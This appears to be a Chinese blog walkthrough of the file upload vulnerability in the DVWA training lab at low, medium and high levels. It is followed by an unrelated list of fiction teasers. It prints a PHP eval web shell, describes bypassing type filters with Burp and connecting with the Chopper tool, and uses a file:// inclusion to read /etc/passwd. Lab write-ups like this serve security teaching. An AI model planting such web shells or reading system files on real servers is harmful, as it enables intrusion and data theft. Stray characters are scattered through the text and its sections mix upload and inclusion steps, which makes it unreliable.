DVWA 之文件上傳漏洞

  • List item

Low

沒有進行任何過濾


在這里插入圖片描述

首相捎泻,上傳一個phpinfo.php,其內代碼如下:
<?php phpinfo(); ?>

上傳路徑:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然后訪問

在這里插入圖片描述

首先笆豁,寫好

說明存在上傳和執(zhí)行漏洞

上傳一句話木馬:
<?php @eval($_POST[“hack”]); ?>
保存為hack.php
然后上傳


在這里插入圖片描述

找到文件上傳目錄

http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php

可以直接用hackbar這個插件闯狱,上傳命令抛计,爆出信息


在這里插入圖片描述

使用菜刀連接


在這里插入圖片描述

在這里插入圖片描述

成功

Medium

有過濾


在這里插入圖片描述

使用str_replace函數是極其不安全的瘦陈,因為可以使用雙寫繞過替換規(guī)則。
同時蛾默,因為替換的只是“../”咏花、“..\”阀趴,所以對采用絕對路徑的方式包含文件是不會受到任何限制的。
可以先在上傳一個
此題要求棚菊,需要上傳 .png或 .jpeg格式文件
因此叔汁,我們想到可以更改文件類型据块,然后上傳
直接hack.php擴展名改為hack.png,然后上傳,


在這里插入圖片描述

可以上傳成功像屋,
使用菜刀連接
在這里插入圖片描述

連接不上
制作圖片碼上傳己莺,同樣如此
那么戈轿,可以使用burp抓包修改文件類型看看


在這里插入圖片描述
在這里插入圖片描述

成功

High

其過濾內容為


在這里插入圖片描述

這個if語句的意思是如果page中不含有file并且page不等于include.php服務器才不會去包含相應的文件思杯。兩個條件只要不滿足其中之一就可以色乾,要么page等于include.php,要么page含有file。用file://流訪問本地文件系統(tǒng)

http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file:///etc/passwd

在這里插入圖片描述

說明存在命令執(zhí)行
上菜刀解虱,結果發(fā)現無聊是如何漆撞,jar版本的死活連不上于宙,使用windows .exe版本的可以悍汛,我也懵逼
在這里插入圖片描述

在這里插入圖片描述

?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末谱俭,一起剝皮案震驚了整個濱河市宵蛀,隨后出現的幾起案子,更是在濱河造成了極大的恐慌凑懂,老刑警劉巖梧宫,帶你破解...
    沈念sama閱讀 222,590評論 6 517
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件塘匣,死亡現場離奇詭異,居然都是意外死亡忌卤,警方通過查閱死者的電腦和手機埠巨,發(fā)現死者居然都...
    沈念sama閱讀 95,157評論 3 399
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來望侈,“玉大人勋桶,你說我怎么就攤上這事【韬” “怎么了鹃锈?”我有些...
    開封第一講書人閱讀 169,301評論 0 362
  • 文/不壞的土叔 我叫張陵屎债,是天一觀的道長垢油。 經常有香客問我圆丹,道長,這世上最難降的妖魔是什么硝枉? 我笑而不...
    開封第一講書人閱讀 60,078評論 1 300
  • 正文 為了忘掉前任倦微,我火速辦了婚禮,結果婚禮上弧可,老公的妹妹穿的比我還像新娘劣欢。我一直安慰自己裁良,他們只是感情好价脾,可當我...
    茶點故事閱讀 69,082評論 6 398
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著犀变,像睡著了一般秋柄。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上省店,一...
    開封第一講書人閱讀 52,682評論 1 312
  • 那天笨触,我揣著相機與錄音芦劣,去河邊找鬼。 笑死虚吟,一個胖子當著我的面吹牛娱俺,可吹牛的內容都是我干的荠卷。 我是一名探鬼主播烛愧,決...
    沈念sama閱讀 41,155評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼慎冤!你這毒婦竟也來了沧卢?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 40,098評論 0 277
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎立磁,沒想到半個月后,有當地人在樹林里發(fā)現了一具尸體宪摧,經...
    沈念sama閱讀 46,638評論 1 319
  • 正文 獨居荒郊野嶺守林人離奇死亡颅崩,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 38,701評論 3 342
  • 正文 我和宋清朗相戀三年沿后,在試婚紗的時候發(fā)現自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片膝蜈。...
    茶點故事閱讀 40,852評論 1 353
  • 序言:一個原本活蹦亂跳的男人離奇死亡饱搏,死狀恐怖置逻,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤肺素,帶...
    沈念sama閱讀 36,520評論 5 351
  • 正文 年R本政府宣布宇驾,位于F島的核電站,受9級特大地震影響塌西,放射性物質發(fā)生泄漏筝尾。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 42,181評論 3 335
  • 文/蒙蒙 一站辉、第九天 我趴在偏房一處隱蔽的房頂上張望饰剥。 院中可真熱鬧薛匪,春花似錦、人聲如沸逸尖。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,674評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至吃谣,卻和暖如春做裙,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背锚贱。 一陣腳步聲響...
    開封第一講書人閱讀 33,788評論 1 274
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留晋修,地道東北人凰盔。 一個月前我還...
    沈念sama閱讀 49,279評論 3 379
  • 正文 我出身青樓,卻偏偏與公主長得像趴拧,于是被迫代替她去往敵國和親山叮。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,851評論 2 361

推薦閱讀更多精彩內容